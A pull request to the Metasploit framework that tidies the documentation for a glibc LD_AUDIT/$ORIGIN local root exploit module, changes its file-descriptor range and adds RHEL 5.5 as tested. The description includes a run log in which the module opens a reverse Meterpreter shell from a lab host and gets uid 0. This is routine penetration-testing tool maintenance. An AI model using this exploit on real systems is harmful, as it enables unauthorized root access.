### PR TITLE
Fix file description and update tested versions

### DIFF
--- a/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md
@@ -1,25 +1,33 @@
 ## Description
 
-  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker - aka glibc `$ORIGIN` expansion vulnerability.
+  This module attempts to gain root privileges on Linux systems by abusing
+  a vulnerability in the GNU C Library (glibc) dynamic linker.
 
 
 ## Vulnerable Application
 
-  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows control over the `$ORIGIN` library search path resulting in execution of arbitrary shared objects.
+  glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
+  properly restrict use of the `LD_AUDIT` environment variable when loading
+  setuid executables which allows control over the `$ORIGIN` library search
+  path resulting in execution of arbitrary shared objects.
 
-  This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.
+  This module opens a file descriptor to the specified suid executable via
+  a hard link, then replaces the hard link with a shared object before
+  instructing the linker to execute the file descriptor, resulting in
+  arbitrary code execution.
 
-  The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.
+  The specified setuid binary must be readable and located on the same
+  file system partition as the specified writable directory.
 
   This module has been tested successfully on:
 
   * glibc 2.5 on CentOS 5.4 (x86_64)
   * glibc 2.5 on CentOS 5.5 (x86_64)
-  * glibc 2.12 on Fedora 13 (i386, x86_64)
+  * glibc 2.12 on Fedora 13 (i386)
+  * glibc 2.5-49 on RHEL 5.5 (x86_64)
 
-  RHEL 5 is reportedly affected, but untested.
-
-  Some versions of `ld.so`, such as the version shipped with Ubuntu 14, hit a failed assertion in `dl_open_worker` causing exploitation to fail.
+  Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
+  hit a failed assertion in `dl_open_worker` causing exploitation to fail.
 
 
 ## Verification Steps

--- a/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
@@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Local
         This module attempts to gain root privileges on Linux systems by abusing
         a vulnerability in the GNU C Library (glibc) dynamic linker.
 
-        glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
-        properly restrict use of the LD_AUDIT environment variable when loading
-        setuid executables which allows control over the $ORIGIN library search
+        glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
+        properly restrict use of the `LD_AUDIT` environment variable when loading
+        setuid executables which allows control over the `$ORIGIN` library search
         path resulting in execution of arbitrary shared objects.
 
         This module opens a file descriptor to the specified suid executable via
@@ -37,12 +37,15 @@ class MetasploitModule < Msf::Exploit::Local
         The specified setuid binary must be readable and located on the same
         file system partition as the specified writable directory.
 
-        This module has been tested successfully on glibc version 2.5 on CentOS
-        5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).
+        This module has been tested successfully on:
 
-        RHEL 5 is reportedly affected, but untested. Some versions of ld.so,
-        such as the version shipped with Ubuntu 14, hit a failed assertion
-        in dl_open_worker causing exploitation to fail.
+        glibc 2.5 on CentOS 5.4 (x86_64);
+        glibc 2.5 on CentOS 5.5 (x86_64);
+        glibc 2.12 on Fedora 13 (i386); and
+        glibc 2.5-49 on RHEL 5.5 (x86_64).
+
+        Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
+        hit a failed assertion in `dl_open_worker` causing exploitation to fail.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -217,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Local
     # Upload exploit
     link_name = ".#{rand_text_alphanumeric 5..10}"
     link_path = "#{base_dir}/#{link_name}"
-    fd = rand(10..200)
+    fd = rand(3..9)
     exp = %(
       rm -rf '#{link_path}'
       mkdir '#{link_path}'


### PR DESCRIPTION
Fix ridiculous file descriptor; and update tested versions to reflect RHEL 5.5.

### RHEL 5.5

```
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] GNU C Library version 2.5 appears vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.knxS5mvZ' (1921 bytes) ...
[*] Writing '/tmp/.nkvuOByv' (307 bytes) ...
[*] Writing '/tmp/.Jk9D00' (207 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.202
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.202:33229) at 2019-04-18 11:12:29 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.202 - Meterpreter session 2 closed.  Reason: User exit
```
